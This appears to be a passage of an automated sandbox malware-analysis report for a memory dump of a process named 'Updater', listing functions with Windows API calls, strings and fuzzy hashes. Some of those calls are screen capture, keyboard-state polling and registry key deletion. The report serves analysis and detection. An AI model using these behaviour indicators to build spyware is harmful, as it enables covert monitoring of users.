Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue_wcslen
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2361764144-4033151799
Opcode ID: 998a54749706a25c2971e71478d599ba933d32e7f42229a226dc307cc8e4e6f6
Instruction ID: 8d89e3bca64b307f2f2c85ccdc35ee48b87458310e76fd0ec9d8312ff3a4a5ea
Opcode Fuzzy Hash: 998a54749706a25c2971e71478d599ba933d32e7f42229a226dc307cc8e4e6f6
Instruction Fuzzy Hash: 69C17D35208201AFDB10DF64C494F2ABBE1FF89314F54859CF45A9B2A2CB75ED46CB91

Function 00BA3105 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 170windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00BA3181
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00BA3191
CreateCompatibleDC.GDI32(?), ref: 00BA319D
SelectObject.GDI32(00000000,?), ref: 00BA31AA
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00BA3216
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00BA3255
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00BA3279
SelectObject.GDI32(?,?), ref: 00BA3281
DeleteObject.GDI32(?), ref: 00BA328A
DeleteDC.GDI32(?), ref: 00BA3291
ReleaseDC.USER32(00000000,?), ref: 00BA329C

Strings

(, xrefs: 00BA3236

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: ebca83368a6483328d388e34064304b8491c4df1353cbaae924845c6e7358fc2
Instruction ID: 383cb7821aca59a266c2e3437656933f5ff7c8c38048c23d9d01d0800788f8eb
Opcode Fuzzy Hash: ebca83368a6483328d388e34064304b8491c4df1353cbaae924845c6e7358fc2
Instruction Fuzzy Hash: 1361E275D00219AFCF04CFA8D884AAEBBF5FF48710F20856AE955A7210E775AA41CF50

Function 00B5D88D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00B5D8D1

Part of subcall function 00B5D46C: _free.LIBCMT ref: 00B5D489
Part of subcall function 00B5D46C: _free.LIBCMT ref: 00B5D49B
Part of subcall function 00B5D46C: _free.LIBCMT ref: 00B5D4AD
Part of subcall function 00B5D46C: _free.LIBCMT ref: 00B5D4BF
Part of subcall function 00B5D46C: _free.LIBCMT ref: 00B5D4D1
Part of subcall function 00B5D46C: _free.LIBCMT ref: 00B5D4E3
Part of subcall function 00B5D46C: _free.LIBCMT ref: 00B5D4F5
Part of subcall function 00B5D46C: _free.LIBCMT ref: 00B5D507
Part of subcall function 00B5D46C: _free.LIBCMT ref: 00B5D519
Part of subcall function 00B5D46C: _free.LIBCMT ref: 00B5D52B
Part of subcall function 00B5D46C: _free.LIBCMT ref: 00B5D53D
Part of subcall function 00B5D46C: _free.LIBCMT ref: 00B5D54F
Part of subcall function 00B5D46C: _free.LIBCMT ref: 00B5D561

_free.LIBCMT ref: 00B5D8C6

Part of subcall function 00B527F4: RtlFreeHeap.NTDLL(00000000,00000000,?,00B2FC79,?,?,00B2111E), ref: 00B5280A

_free.LIBCMT ref: 00B5D8E8
_free.LIBCMT ref: 00B5D8FD
_free.LIBCMT ref: 00B5D908
_free.LIBCMT ref: 00B5D92A
_free.LIBCMT ref: 00B5D93D
_free.LIBCMT ref: 00B5D94B
_free.LIBCMT ref: 00B5D956
_free.LIBCMT ref: 00B5D98E
_free.LIBCMT ref: 00B5D995
_free.LIBCMT ref: 00B5D9B2
_free.LIBCMT ref: 00B5D9CA

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: _free$FreeHeap___free_lconv_mon
String ID:
API String ID: 358854727-0
Opcode ID: 6b08b1287b9a8f84c33d379d0ec8645f42f42a4dfb7ffdc35eac39553aa18864
Instruction ID: 1c591d754648406823b24f5069c6f5115c979d89bf7f680201f00a2ca0b3614f
Opcode Fuzzy Hash: 6b08b1287b9a8f84c33d379d0ec8645f42f42a4dfb7ffdc35eac39553aa18864
Instruction Fuzzy Hash: A3319832608341DFEB35EB38D845B5AB3E8EF05312F104AE9E959C7191DE31AD88DB20

Function 00B84700 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 274windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00B8473E
_wcslen.LIBCMT ref: 00B84749
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00B84848
GetClassNameW.USER32(?,?,00000400), ref: 00B848B9
GetDlgCtrlID.USER32(?), ref: 00B8491D
GetWindowRect.USER32(?,?), ref: 00B84942
GetParent.USER32(?), ref: 00B84960
ScreenToClient.USER32(00000000), ref: 00B84967
GetClassNameW.USER32(?,?,00000100), ref: 00B849E1
GetWindowTextW.USER32(?,?,00000400), ref: 00B84A1D

Strings

%s%u, xrefs: 00B847D9

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 3c456f2d3347ebbc6cb0af71e320bda6d005b4e732e0cf714524f8c4732745bb
Instruction ID: 04a51d358888b549646fc380c2e57cd77959c9c48668bce217d5209d4e2b75b9
Opcode Fuzzy Hash: 3c456f2d3347ebbc6cb0af71e320bda6d005b4e732e0cf714524f8c4732745bb
Instruction Fuzzy Hash: 5EA18B71204707EFDB24EF64C885BABB7E8FF44344F10896EF59A861A1EB30A945CB51

Function 00B858EC Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00B85928
GetWindowTextW.USER32(?,?,00000400), ref: 00B8596A
_wcslen.LIBCMT ref: 00B8597B
CharUpperBuffW.USER32(?,00000000), ref: 00B85987
_wcsstr.LIBVCRUNTIME ref: 00B859BC
GetClassNameW.USER32(00000018,?,00000400), ref: 00B859F4
GetWindowTextW.USER32(?,?,00000400), ref: 00B85A2D
GetClassNameW.USER32(00000018,?,00000400), ref: 00B85A87
GetClassNameW.USER32(?,?,00000400), ref: 00B85AB9
GetWindowRect.USER32(?,?), ref: 00B85B31

Strings

ThumbnailClass, xrefs: 00B859FF, 00B85A92

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: a829ad29f670cdde0915fc43805cb7b69e0d67e3a1afec00c078c73e59cf9194
Instruction ID: 546572bba363ed3fc1d019e4dd3c6f7af28eb7ae0572ad93f3c149bcfac2a2bc
Opcode Fuzzy Hash: a829ad29f670cdde0915fc43805cb7b69e0d67e3a1afec00c078c73e59cf9194
Instruction Fuzzy Hash: B191D531104B07AFDB28EF24C885BA9B7E8FF15314F0046A9F996830A1EB31ED55CB91

Function 00BB9709 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B34E5A: GetWindowLongW.USER32(00000000,000000EB), ref: 00B34E6B

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00BB9759
GetFocus.USER32 ref: 00BB9769
GetDlgCtrlID.USER32(00000000), ref: 00BB9774
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00BB98CA
GetMenuItemCount.USER32(?), ref: 00BB98EA
GetMenuItemID.USER32(?,00000000), ref: 00BB98FD
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00BB9933
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00BB997D
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BB99B5
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00BB99EA

Strings

0, xrefs: 00BB9897

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 4a02aeabbea9dbb7f09e8cf62fcd8b34037031793fc8ee690eb88494dd9ab7de
Instruction ID: 0f39c0405663a60534ad2b0488a3516dd554b0c9a538347502289917e171f358
Opcode Fuzzy Hash: 4a02aeabbea9dbb7f09e8cf62fcd8b34037031793fc8ee690eb88494dd9ab7de
Instruction Fuzzy Hash: 0C81A171504301AFDB14DF14C884ABBBBE8FF89714F1049ADFA9597291DBB0E905CB62

Function 00B8CDE4 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 191windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00BF2970,000000FF,00000000,00000030), ref: 00B8CE60
SetMenuItemInfoW.USER32(00BF2970,00000004,00000000,00000030), ref: 00B8CE95
Sleep.KERNEL32(000001F4), ref: 00B8CEA7
GetMenuItemCount.USER32(?), ref: 00B8CEED
GetMenuItemID.USER32(?,00000000), ref: 00B8CF0A
GetMenuItemID.USER32(?,-00000001), ref: 00B8CF36
GetMenuItemID.USER32(?,?), ref: 00B8CF7D
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B8CFC3
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B8CFD8
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B8CFF9

Strings

0, xrefs: 00B8CDF1

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: 0
API String ID: 1460738036-4108050209
Opcode ID: 53c1897626389a10970bd769e8fd81a35d96e333b822e24a0f26954fa6f5585d
Instruction ID: c25510107fc7d16b5501fae59f021c5f86c0aa7b700e7015f6d9e3931501cfc6
Opcode Fuzzy Hash: 53c1897626389a10970bd769e8fd81a35d96e333b822e24a0f26954fa6f5585d
Instruction Fuzzy Hash: 19617FB090024AAFEF21EF64D988AFE7FE9EB05304F144195F901A32A1DB75AD15CB71

Function 00BAD5F3 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 105registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00BAD623
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00BAD64C
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00BAD709

Part of subcall function 00BAD5F3: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00BAD669
Part of subcall function 00BAD5F3: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00BAD67C
Part of subcall function 00BAD5F3: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00BAD68E
Part of subcall function 00BAD5F3: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00BAD6C4
Part of subcall function 00BAD5F3: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00BAD6E7

RegDeleteKeyW.ADVAPI32(?,?), ref: 00BAD6B2

Strings

advapi32.dll, xrefs: 00BAD677
RegDeleteKeyExW, xrefs: 00BAD688

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: fdac24e1e3d58e7da55c190238fd79eb610a54a57ae6bc01e907aec5262efee8
Instruction ID: b43d883e6c4f24b71c6c4cb22c9532dcbbf2ca3e0764455560c2e55da3ed9c6c
Opcode Fuzzy Hash: fdac24e1e3d58e7da55c190238fd79eb610a54a57ae6bc01e907aec5262efee8
Instruction Fuzzy Hash: 1A317275901129BBD7209B95DC88EFFBBBCEF56710F0001A5F806E3154EB745E46DAA0

Function 00B9492E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B9494E
_wcslen.LIBCMT ref: 00B9497C
CreateDirectoryW.KERNEL32(?,00000000), ref: 00B949AD
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00B949D2
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00B94A5C
CloseHandle.KERNEL32(00000000), ref: 00B94A67
RemoveDirectoryW.KERNEL32(?), ref: 00B94A70
CloseHandle.KERNEL32(00000000), ref: 00B94A7A

Strings

\??\%s, xrefs: 00B9496A
:, xrefs: 00B94991
\, xrefs: 00B94986

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: e368b737078effd9b318b8409889f6bfc594630245a4f29a2f9d92134fc0cc29
Instruction ID: 4d6a4a2622aced82a84ba9259ba29ac95cdf889415900a88a3bdf596191e2d4b
Opcode Fuzzy Hash: e368b737078effd9b318b8409889f6bfc594630245a4f29a2f9d92134fc0cc29
Instruction Fuzzy Hash: 8A317E7294410AABDB21DFA0DC49FEB37FCEF88740F1042B6FA08D2160EB7496458B64

Function 00B8F51C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00B8F521

Part of subcall function 00B3FB90: timeGetTime.WINMM(?,?,00B8F540), ref: 00B3FB94

Sleep.KERNEL32(0000000A), ref: 00B8F54D
EnumThreadWindows.USER32(?,Function_0006F4CF,00000000), ref: 00B8F571
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00B8F593
SetActiveWindow.USER32 ref: 00B8F5B2
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B8F5C0
SendMessageW.USER32(00000010,00000000,00000000), ref: 00B8F5DF
Sleep.KERNEL32(000000FA), ref: 00B8F5EA
IsWindow.USER32 ref: 00B8F5F6
EndDialog.USER32(00000000), ref: 00B8F607

Strings

BUTTON, xrefs: 00B8F585

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: ff93833ea52903eb0ae50fc3a118b8d2e2af846af02af0cf2a57941911f79324
Instruction ID: 23d33e02de56176ced3a6f5dad7a19d4fd0228ca6a135ffcb5d9181346d2d707
Opcode Fuzzy Hash: ff93833ea52903eb0ae50fc3a118b8d2e2af846af02af0cf2a57941911f79324
Instruction Fuzzy Hash: C92142B4200206AFE7116F61EC89A363BE9FBA4B85F144265F50693171FFBA8D44CB61

Function 00B8F878 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B8F8D9
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B8F8EF
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B8F900
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B8F912
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B8F923

Strings

open , xrefs: 00B8F888
play PlayMe wait, xrefs: 00B8F90D
close PlayMe, xrefs: 00B8F8EA, 00B8F917
alias PlayMe, xrefs: 00B8F8B2
status PlayMe mode, xrefs: 00B8F8D4
play PlayMe, xrefs: 00B8F91E

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: e9f51b005bdc78f3fe8e1154424d75e9da4fbc08f46aea7021dc15294a34284d
Instruction ID: f107a5aff0a8001dc67ada3810e1cc0e067cf2675f471aacd21928e9d587e56f
Opcode Fuzzy Hash: e9f51b005bdc78f3fe8e1154424d75e9da4fbc08f46aea7021dc15294a34284d
Instruction Fuzzy Hash: 5A1154215941AA79D720B666AC49EFF7BFCEBD2B00F4005B9B415920E1EEA05D45C7A0

Function 00B8ADC0 Relevance: 18.2, APIs: 12, Instructions: 196keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00B8AE4C
SetKeyboardState.USER32(?), ref: 00B8AEB7
GetAsyncKeyState.USER32(000000A0), ref: 00B8AED6
GetKeyState.USER32(000000A0), ref: 00B8AEED
GetAsyncKeyState.USER32(000000A1), ref: 00B8AF1C
GetKeyState.USER32(000000A1), ref: 00B8AF2D
GetAsyncKeyState.USER32(00000011), ref: 00B8AF59
GetKeyState.USER32(00000011), ref: 00B8AF67
GetAsyncKeyState.USER32(00000012), ref: 00B8AF90
GetKeyState.USER32(00000012), ref: 00B8AF9E
GetAsyncKeyState.USER32(0000005B), ref: 00B8AFC7
GetKeyState.USER32(0000005B), ref: 00B8AFD5

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: cbce898d400e313572e0dfd3bdb71b544f9258ddba8aa7e5a82a3cc578978419
Instruction ID: 1e449640f6130c0cc28d86be968aa1b67d493a0a703985dddcf10edd9a0ed0bc
Opcode Fuzzy Hash: cbce898d400e313572e0dfd3bdb71b544f9258ddba8aa7e5a82a3cc578978419
Instruction Fuzzy Hash: CF61F664A087882AFB34F77084517EAAFF4DF12340F0849DEC5C29B5E2DA649A4CC763

Function 00B86CAD Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00B86CC9
GetWindowRect.USER32(00000000,?), ref: 00B86CE2
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00B86D40
GetDlgItem.USER32(?,00000002), ref: 00B86D50
GetWindowRect.USER32(00000000,?), ref: 00B86D62
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00B86DB6
GetDlgItem.USER32(?,000003E9), ref: 00B86DC4
GetWindowRect.USER32(00000000,?), ref: 00B86DD6
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00B86E18
GetDlgItem.USER32(?,000003EA), ref: 00B86E2B
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00B86E41
InvalidateRect.USER32(?,00000000,00000001), ref: 00B86E4E

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: aee8abd8cf061ae4f884cf01fa902450afa3a6c481dbebeec2b797c42f040485
Instruction ID: 41fb6d189cc21ccf783fd35996edc3f330090db963e3b010356d047084a7a935
Opcode Fuzzy Hash: aee8abd8cf061ae4f884cf01fa902450afa3a6c481dbebeec2b797c42f040485
Instruction Fuzzy Hash: 1C51F3B5B00205AFDF18DF69DD85AAEBBB5FB48311F108269F915E7290EB749D00CB60

Function 00B34854 Relevance: 18.2, APIs: 12, Instructions: 171timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3438C: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B35687,01472BD8,?,?,?), ref: 00B343EF

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00B3490C
KillTimer.USER32(00000000,?,?,?,?,00B33F4E,00000000,?,?,00B34387,?,?), ref: 00B349AB
DestroyAcceleratorTable.USER32(00000000), ref: 00B788E4
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B33F4E,00000000,?,?,00B34387,?,?), ref: 00B78917
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B33F4E,00000000,?,?,00B34387,?,?), ref: 00B7892E
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B33F4E,00000000,?,?,00B34387,?,?), ref: 00B7894A
DeleteObject.GDI32(00000000), ref: 00B7895C

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
